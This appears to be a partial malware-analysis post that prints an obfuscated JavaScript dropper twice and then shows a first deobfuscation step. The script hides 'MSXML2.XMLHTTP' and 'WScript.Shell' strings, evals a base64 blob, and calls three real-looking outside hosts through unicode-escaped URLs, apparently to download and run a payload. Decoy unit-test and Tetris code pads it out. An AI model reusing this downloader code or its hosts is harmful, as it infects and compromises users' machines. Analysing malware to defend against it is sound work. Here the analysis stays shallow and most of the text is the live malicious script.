votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, "PROPER1");
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith("PROPER1"), "Function called with 'PROPER1' argument");
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, ["PROPER1", "PROPER2"]);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");
};
votgorodazaspinoyiputkoroheCCCrodmands.votgorodazaspinoyiputkoroheCCCsubtract = function(votgorodazaspinoyiputkoroheCCCparam1, votgorodazaspinoyiputkoroheCCCparam2) {
return new votgorodazaspinoyiputkoroheCCCrodmands(votgorodazaspinoyiputkoroheCCCparam1.x - votgorodazaspinoyiputkoroheCCCparam2.x, votgorodazaspinoyiputkoroheCCCparam1.y - votgorodazaspinoyiputkoroheCCCparam2.y);
};
var votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var votgorodazaspinoyiputkoroheCCCerrant = 0;
function votgorodazaspinoyiputkoroheCCCachievment(votgorodazaspinoyiputkoroheCCCbidttt){
if(votgorodazaspinoyiputkoroheCCCbidttt==1){return 2;}
else{return 17;}
return 3;};
function votgorodazaspinoyiputkoroheCCCcenter(votgorodazaspinoyiputkoroheCCCrivulet) {
request = votgorodazaspinoyiputkoroheCCCrivulet;
for (var votgorodazaspinoyiputkoroheCCCi in votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq){request = request.replace(votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq[votgorodazaspinoyiputkoroheCCCi]);}
return request;
};
var votgorodazaspinoyiputkoroheCCCchosen = 33/3-10;
function votgorodazaspinoyiputkoroheCCCrodmands(x, y) {
this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};
var votgorodazaspinoyiputkoroheCCClulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
...
var votgorodazaspinoyiputkoroheCCCd7 = votgorodazaspinoyiputkoroheCCCcenter("00M"+"11SX"+"22ML"+("votgorodazaspinoyiputkoroheCCCcontinues","votgorodazaspinoyiputkoroheCCCoxfordshire","votgorodazaspinoyiputkoroheCCCinconsolable","votgorodazaspinoyiputkoroheCCCgazelle","votgorodazaspinoyiputkoroheCCClaundry","2.")+"PIPIPKAM"+"LH"+"TT"+("votgorodazaspinoyiputkoroheCCCsurvival","votgorodazaspinoyiputkoroheCCCmotif","votgorodazaspinoyiputkoroheCCCchaotic","votgorodazaspinoyiputkoroheCCClotus","votgorodazaspinoyiputkoroheCCCheritage","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCcamera","votgorodazaspinoyiputkoroheCCCemacs","P}")+"WU"+("votgorodazaspinoyiputkoroheCCCeddie","votgorodazaspinoyiputkoroheCCCflustered","votgorodazaspinoyiputkoroheCCCexalt","votgorodazaspinoyiputkoroheCCCfahrenheit","votgorodazaspinoyiputkoroheCCCcredit","votgorodazaspinoyiputkoroheCCCclassroom","votgorodazaspinoyiputkoroheCCCtrends","cr")+("votgorodazaspinoyiputkoroheCCCunbending","votgorodazaspinoyiputkoroheCCCranked","votgorodazaspinoyiputkoroheCCCavenue","votgorodazaspinoyiputkoroheCCCdurable","votgorodazaspinoyiputkoroheCCCvestibule","votgorodazaspinoyiputkoroheCCCceremony","votgorodazaspinoyiputkoroheCCCelementary","votgorodazaspinoyiputkoroheCCCcongregate","ip")+"t:S"+("votgorodazaspinoyiputkoroheCCCmining","votgorodazaspinoyiputkoroheCCCsurmount","votgorodazaspinoyiputkoroheCCCintimidate","votgorodazaspinoyiputkoroheCCCbetween","votgorodazaspinoyiputkoroheCCCcroatia","votgorodazaspinoyiputkoroheCCCampland","votgorodazaspinoyiputkoroheCCCglenn","votgorodazaspinoyiputkoroheCCCmunicipality","h")+"e"+("votgorodazaspinoyiputkoroheCCCvoracious","votgorodazaspinoyiputkoroheCCCreaper","votgorodazaspinoyiputkoroheCCCcrispin","votgorodazaspinoyiputkoroheCCCcount","votgorodazaspinoyiputkoroheCCCeffeminacy","votgorodazaspinoyiputkoroheCCCmashed","votgorodazaspinoyiputkoroheCCCconvinced","votgorodazaspinoyiputkoroheCCCslovak","ll"));
...
...
eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm.........XB1dGtvcm9oZUNDQ2NjYTsNCn07".votgorodazaspinoyiputkoroheCCCmanysecretthings());
...
votgorodazaspinoyiputkoroheCCCTetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) ); break; case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};
};
...
try{
votgorodazaspinoyiputkoroheCCCShtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}
var votgorodazaspinoyiputkoroheCCCpublisher = new votgorodazaspinoyiputkoroheCCCMBJSL.votgorodazaspinoyiputkoroheCCCPublisher();
var votgorodazaspinoyiputkoroheCCCspyFunction1 = votgorodazaspinoyiputkoroheCCCsinon.votgorodazaspinoyiputkoroheCCCspy();
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCsubscribe(votgorodazaspinoyiputkoroheCCCspyFunction1, this.votgorodazaspinoyiputkoroheCCCtype1);
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(), "Function called without arguments");
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, "PROPER1");
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith("PROPER1"), "Function called with 'PROPER1' argument");
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, ["PROPER1", "PROPER2"]);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");
};
votgorodazaspinoyiputkoroheCCCrodmands.votgorodazaspinoyiputkoroheCCCsubtract = function(votgorodazaspinoyiputkoroheCCCparam1, votgorodazaspinoyiputkoroheCCCparam2) {
return new votgorodazaspinoyiputkoroheCCCrodmands(votgorodazaspinoyiputkoroheCCCparam1.x - votgorodazaspinoyiputkoroheCCCparam2.x, votgorodazaspinoyiputkoroheCCCparam1.y - votgorodazaspinoyiputkoroheCCCparam2.y);
};
var votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var votgorodazaspinoyiputkoroheCCCerrant = 0;
function votgorodazaspinoyiputkoroheCCCachievment(votgorodazaspinoyiputkoroheCCCbidttt){
if(votgorodazaspinoyiputkoroheCCCbidttt==1){return 2;}
else{return 17;}
return 3;};
function votgorodazaspinoyiputkoroheCCCcenter(votgorodazaspinoyiputkoroheCCCrivulet) {
request = votgorodazaspinoyiputkoroheCCCrivulet;
for (var votgorodazaspinoyiputkoroheCCCi in votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq){request = request.replace(votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq[votgorodazaspinoyiputkoroheCCCi]);}
return request;
};
var votgorodazaspinoyiputkoroheCCCchosen = 33/3-10;
function votgorodazaspinoyiputkoroheCCCrodmands(x, y) {
this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};
var votgorodazaspinoyiputkoroheCCClulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
...
var votgorodazaspinoyiputkoroheCCCd7 = votgorodazaspinoyiputkoroheCCCcenter("00M"+"11SX"+"22ML"+("votgorodazaspinoyiputkoroheCCCcontinues","votgorodazaspinoyiputkoroheCCCoxfordshire","votgorodazaspinoyiputkoroheCCCinconsolable","votgorodazaspinoyiputkoroheCCCgazelle","votgorodazaspinoyiputkoroheCCClaundry","2.")+"PIPIPKAM"+"LH"+"TT"+("votgorodazaspinoyiputkoroheCCCsurvival","votgorodazaspinoyiputkoroheCCCmotif","votgorodazaspinoyiputkoroheCCCchaotic","votgorodazaspinoyiputkoroheCCClotus","votgorodazaspinoyiputkoroheCCCheritage","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCcamera","votgorodazaspinoyiputkoroheCCCemacs","P}")+"WU"+("votgorodazaspinoyiputkoroheCCCeddie","votgorodazaspinoyiputkoroheCCCflustered","votgorodazaspinoyiputkoroheCCCexalt","votgorodazaspinoyiputkoroheCCCfahrenheit","votgorodazaspinoyiputkoroheCCCcredit","votgorodazaspinoyiputkoroheCCCclassroom","votgorodazaspinoyiputkoroheCCCtrends","cr")+("votgorodazaspinoyiputkoroheCCCunbending","votgorodazaspinoyiputkoroheCCCranked","votgorodazaspinoyiputkoroheCCCavenue","votgorodazaspinoyiputkoroheCCCdurable","votgorodazaspinoyiputkoroheCCCvestibule","votgorodazaspinoyiputkoroheCCCceremony","votgorodazaspinoyiputkoroheCCCelementary","votgorodazaspinoyiputkoroheCCCcongregate","ip")+"t:S"+("votgorodazaspinoyiputkoroheCCCmining","votgorodazaspinoyiputkoroheCCCsurmount","votgorodazaspinoyiputkoroheCCCintimidate","votgorodazaspinoyiputkoroheCCCbetween","votgorodazaspinoyiputkoroheCCCcroatia","votgorodazaspinoyiputkoroheCCCampland","votgorodazaspinoyiputkoroheCCCglenn","votgorodazaspinoyiputkoroheCCCmunicipality","h")+"e"+("votgorodazaspinoyiputkoroheCCCvoracious","votgorodazaspinoyiputkoroheCCCreaper","votgorodazaspinoyiputkoroheCCCcrispin","votgorodazaspinoyiputkoroheCCCcount","votgorodazaspinoyiputkoroheCCCeffeminacy","votgorodazaspinoyiputkoroheCCCmashed","votgorodazaspinoyiputkoroheCCCconvinced","votgorodazaspinoyiputkoroheCCCslovak","ll"));
...
...
eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm.........XB1dGtvcm9oZUNDQ2NjYTsNCn07".votgorodazaspinoyiputkoroheCCCmanysecretthings());
...
votgorodazaspinoyiputkoroheCCCTetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) ); break; case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};
};
...
try{
votgorodazaspinoyiputkoroheCCCShtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}
Deobfuscation :
1)
First thing to do : delete all "votgorodazaspinoyiputkoroheCCC" and "votgorodazaspinoyiputkorohe" parts :
rodmands.create = function(){
var publisher = new MBJSL.Publisher();
var spyFunction1 = sinon.spy();
publisher.subscribe(spyFunction1, this.type1);
publisher.publish(this.type1);
ok(spyFunction1.calledWith(), "Function called without arguments");
publisher.publish(this.type1, "PROPER1");
ok(spyFunction1.calledWith("PROPER1"), "Function called with 'PROPER1' argument");
publisher.publish(this.type1, ["PROPER1", "PROPER2"]);
ok(spyFunction1.calledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");
};
rodmands.subtract = function(param1, param2) {
return new rodmands(param1.x - param2.x, param1.y - param2.y);
};
var qtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var errant = 0;
function achievment(bidttt){
if(bidttt==1){return 2;}
else{return 17;}
return 3;};
function center(rivulet) {
request = rivulet;
for (var i in qtcnthltqfqrhfq){request = request.replace(i, qtcnthltqfqrhfq);}
return request;
};
var chosen = 33/3-10;
function rodmands(x, y) {
this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};
var lulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
var d7 = center("00M"+"11SX"+"22ML"+("continues","oxfordshire","inconsolable","gazelle","laundry","2.")+"PIPIPKAM"+"LH"+"TT"+("survival","motif","chaotic","lotus","heritage","places","camera","emacs","P}")+"WU"+("eddie","flustered","exalt","fahrenheit","credit","classroom","trends","cr")+("unbending","ranked","avenue","durable","vestibule","ceremony","elementary","congregate","ip")+"t:S"+("mining","surmount","intimidate","between","croatia","ampland","glenn","municipality","h")+"e"+("voracious","reaper","crispin","count","effeminacy","mashed","convinced","slovak","ll"));
...
...
eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm.........XB1dGtvcm9oZUNDQ2NjYTsNCn07".manysecretthings());
Tetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) ); break; case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};
};
...
try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}
var publisher = new MBJSL.Publisher();
var spyFunction1 = sinon.spy();
publisher.subscribe(spyFunction1, this.type1);
publisher.publish(this.type1);
ok(spyFunction1.calledWith(), "Function called without arguments");
publisher.publish(this.type1, "PROPER1");
ok(spyFunction1.calledWith("PROPER1"), "Function called with 'PROPER1' argument");
publisher.publish(this.type1, ["PROPER1", "PROPER2"]);
ok(spyFunction1.calledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");
};
rodmands.subtract = function(param1, param2) {
return new rodmands(param1.x - param2.x, param1.y - param2.y);
};
var qtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var errant = 0;
function achievment(bidttt){
if(bidttt==1){return 2;}
else{return 17;}
return 3;};
function center(rivulet) {
request = rivulet;
for (var i in qtcnthltqfqrhfq){request = request.replace(i, qtcnthltqfqrhfq);}
return request;
};
var chosen = 33/3-10;
function rodmands(x, y) {
this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};
var lulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
var d7 = center("00M"+"11SX"+"22ML"+("continues","oxfordshire","inconsolable","gazelle","laundry","2.")+"PIPIPKAM"+"LH"+"TT"+("survival","motif","chaotic","lotus","heritage","places","camera","emacs","P}")+"WU"+("eddie","flustered","exalt","fahrenheit","credit","classroom","trends","cr")+("unbending","ranked","avenue","durable","vestibule","ceremony","elementary","congregate","ip")+"t:S"+("mining","surmount","intimidate","between","croatia","ampland","glenn","municipality","h")+"e"+("voracious","reaper","crispin","count","effeminacy","mashed","convinced","slovak","ll"));
...
...
